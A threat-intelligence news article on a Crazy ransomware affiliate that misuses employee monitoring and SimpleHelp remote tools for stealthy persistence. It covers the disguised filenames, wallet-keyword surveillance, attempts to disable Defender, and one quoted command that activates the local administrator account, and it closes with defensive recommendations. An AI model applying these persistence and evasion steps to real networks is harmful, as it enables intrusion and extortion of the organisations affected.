Crazy Ransomware Operator Weaponizes Employee Monitoring Software for Stealth Persistence

A Crazy ransomware affiliate is abusing legitimate employee monitoring software and remote support tools to maintain stealth persistence inside corporate networks, blending malicious activity with normal administrative operations before deploying ransomware.

Researchers at Huntress investigated multiple intrusions where the threat actor deployed Net Monitor for Employees Professional alongside the SimpleHelp remote access client — both legitimate tools that allowed the attacker to operate undetected within standard enterprise tooling.

Initial Access and Persistence

Both observed breaches were enabled through compromised SSL VPN credentials. Once inside, the attacker installed Net Monitor for Employees Professional using the Windows Installer utility (msiexec.exe), pulling the agent directly from the developer's website. The tool provided full interactive access — remote desktop viewing, file transfer, and command execution on compromised systems.

The attacker attempted to activate the local administrator account via net user administrator /active:yes and established redundant persistence by downloading the SimpleHelp remote access client through PowerShell. The SimpleHelp binary was disguised using filenames mimicking legitimate processes — vshost.exe (resembling Visual Studio) and OneDriveSvc.exe staged under C:\ProgramData\OneDriveSvc\.

This dual-tool approach ensured continued access even if one tool was discovered and removed.

Pre-Deployment Reconnaissance

In one intrusion, the attacker configured monitoring rules within SimpleHelp to trigger alerts when victims accessed cryptocurrency wallets or remote management tools. Huntress observed the agent continuously cycling through triggers for cryptocurrency-related keywords including wallet services (MetaMask, Exodus, Blockchain), exchanges (Binance, Bybit, KuCoin, Bitrue, Poloniex), blockchain explorers (Etherscan, BscScan), and the payment platform Payoneer.

The agent simultaneously monitored for remote access tool keywords — RDP, AnyDesk, UltraView, TeamViewer, and VNC — likely to detect if administrators were actively connecting to the compromised machine.

Defense Evasion

The attacker attempted to disable Windows Defender by stopping and deleting associated services, removing the primary endpoint protection before ransomware deployment.

Attribution

While only one incident progressed to actual Crazy ransomware deployment, Huntress assessed both intrusions were conducted by the same operator based on reused filenames (vhost.exe) and overlapping command-and-control infrastructure.

Recommendation

Organizations should monitor for unauthorized installations of remote monitoring and employee surveillance tools, which increasingly serve as attacker persistence mechanisms that blend into legitimate network traffic. Enforce MFA on all SSL VPN and remote access services — both observed intrusions began with compromised VPN credentials. Audit for unexpected SimpleHelp, Net Monitor, or similar RMM tool deployments. Alert on msiexec.exe pulling installers from external sources and PowerShell downloading executables into ProgramData directories.